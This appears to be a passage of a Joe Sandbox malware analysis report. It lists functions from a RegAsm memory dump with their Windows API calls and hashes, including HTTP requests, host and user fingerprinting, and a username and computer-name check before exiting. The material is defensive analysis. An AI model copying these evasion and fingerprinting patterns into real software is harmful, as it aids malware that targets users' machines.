                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4141B7B1D00248AFCB00EFB9D946BDD7B74EB09744F10816EF51567281DB389648C7E5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00413A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,0156F958,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,015724D8,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413AB5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$Open$ConnectHttpOptionRequestlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR
                                                                                                                                                                                                                                                                                                  • API String ID: 1815705353-2579291623
                                                                                                                                                                                                                                                                                                  • Opcode ID: 29369b383e77385b3c5e2df5f409f7e149f79e40e97b6244fb7927c41833eb8e
                                                                                                                                                                                                                                                                                                  • Instruction ID: ea8fe1bea799831a1bfffcb10daa165b53663d9ec20256ad752a871f992b9cff
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29369b383e77385b3c5e2df5f409f7e149f79e40e97b6244fb7927c41833eb8e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08315274904248DADB10EBA5C5067DD7BB8AF15308F5041AEE905636D3DBBC2B08CBE6
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C7F3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C7F3095
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C87F688,00001000), ref: 6C7F35D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7F35E0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C7F35FD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7F363F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7F369F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F35A0: __aulldiv.LIBCMT ref: 6C7F36E4
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F309F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8156EE,?,00000001), ref: 6C815B85
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: EnterCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815B90
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: LeaveCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815BD8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: GetTickCount64.KERNEL32 ref: 6C815BE4
                                                                                                                                                                                                                                                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C7F30BE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C7F3127
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F30F0: __aulldiv.LIBCMT ref: 6C7F3140
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82AB2A: __onexit.LIBCMT ref: 6C82AB30
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4291168024-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1484a2a87a11838f89d7edb7ccd5e04918b401f17c18668e552b136a7de395f0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4a16f77e82b0a0c4cbb1b6a0c0530000cc0db25f29815486b7d4f2afd43dbc30
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1484a2a87a11838f89d7edb7ccd5e04918b401f17c18668e552b136a7de395f0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAF0D622D2075496CB31EF7989891EA73B0AF7B218F50573AE85953611FB2066D8C3E2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004119C0 Relevance: 4.5, APIs: 3, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004119DC
                                                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004119F7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004119FE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bcc58d43892302e84752d8720c11c2692e214fff34667dd5a0482a2640b4e2d4
                                                                                                                                                                                                                                                                                                  • Instruction ID: ac0064d5e055494f77bdf6553da814fcfcb78952508ca86c52a6e4941c22f22a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcc58d43892302e84752d8720c11c2692e214fff34667dd5a0482a2640b4e2d4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4F02735A0523867E720AB84DC05FDE77289F05710F000094FF84AB2D0DBB05E8487D4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410260 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562ED0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562ED0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocComputerNameProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 4203777966-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7bce67f87bdb96f85597cc7a337a5ba78b465bb225b0d0b4e914754af934b001
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4b37c6b9c783d41ef7fb4556bea2f0c7907c2bd1f90e8b131d8aee123ed8a75f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bce67f87bdb96f85597cc7a337a5ba78b465bb225b0d0b4e914754af934b001
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06E08CB5640228ABE3009BD8AC0EBDB7BADDB0AB51F000192BB05D3240E6F48D0047E4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00401050 Relevance: 4.5, APIs: 3, Instructions: 19stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040105B,01562ED0,004184AF), ref: 0041026C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: HeapAlloc.KERNEL32(00000000,?,?,?,0040105B,01562ED0,004184AF), ref: 00410273
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410260: GetComputerNameA.KERNEL32(00000000,004184AF), ref: 00410287
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                  • strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocNamestrcmp$ComputerExitUser
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2098570390-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c087e7d871184e6450b3b76f68df29489e174e0935f95b3891491568ebb2438e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 26cb4187d2c4df1171f7cb5428b4e0e717764192679f396c01235be0c1ba569e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c087e7d871184e6450b3b76f68df29489e174e0935f95b3891491568ebb2438e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97D05BB2D0060156CF1077B25C59E5B316D5A24309B00143FFC40D3151E63DFCD4827D
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00406A20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000040,vk@,?,?,?,?,00406B76,?,?,?,?,00000000), ref: 00406A95
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                  • String ID: vk@
                                                                                                                                                                                                                                                                                                  • API String ID: 544645111-1609055756
                                                                                                                                                                                                                                                                                                  • Opcode ID: abe993e6a5faea2bfcf56a2b20c08ab0ee7ea3218432fb0e61e077619d9822d5
                                                                                                                                                                                                                                                                                                  • Instruction ID: ef246bb6e77e2ce5c1cbaeb9d736d4ed160d525c385bb499bba06b0d7229889a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abe993e6a5faea2bfcf56a2b20c08ab0ee7ea3218432fb0e61e077619d9822d5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C11C6717041149FD724EF58DC80BA5F3E9FB0A300F11853BE94AE3280D239AD619B99
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: .kB
                                                                                                                                                                                                                                                                                                  • API String ID: 1699248803-3544784936
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8ddb3fbb5f101234d18f10792ea48ab4f94465df1fa0f1a004282101dffa5124
                                                                                                                                                                                                                                                                                                  • Instruction ID: 08e6df121948f359e20d6638f50baa7717a6df4eef03d69ec9a9e382529e61fd
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ddb3fbb5f101234d18f10792ea48ab4f94465df1fa0f1a004282101dffa5124
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF08231A1015CABDB50DB98DC51B9DB7FDDB44715F1041A6AA08A72C0E6706F068B94
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00411610 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                  • String ID: *@
                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-721074590
                                                                                                                                                                                                                                                                                                  • Opcode ID: d4a04352c1afe236edbef256063f287af5637b0053568ba969055f4ba9eb999a
                                                                                                                                                                                                                                                                                                  • Instruction ID: f6536893b7a7aeed5e907a3204093546bb083ccea3707cf4767cf421749fbeef
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4a04352c1afe236edbef256063f287af5637b0053568ba969055f4ba9eb999a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF08271901658ABC710DF58D901B997768EB15B30F10436AFC35937D0C73D6A4086C4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410CD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentProfilelstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                                                                                                                  • API String ID: 2831436455-1654365787
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2ef8fbb7949aabe7868359b9e21dc6183fcb6fe57ffee9621cf9c697f8b64d8d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 41a17a1faf57410821858b33150c3f320e6afa38bc50d74bf31dd174f95e6ec7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ef8fbb7949aabe7868359b9e21dc6183fcb6fe57ffee9621cf9c697f8b64d8d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AFE0923170412857CB20AAD8FC02BED776C9B04615F00417AFD08E3281EE685A1887D9
                                                                                                                                                                                                                                                                                                  Uniqueness

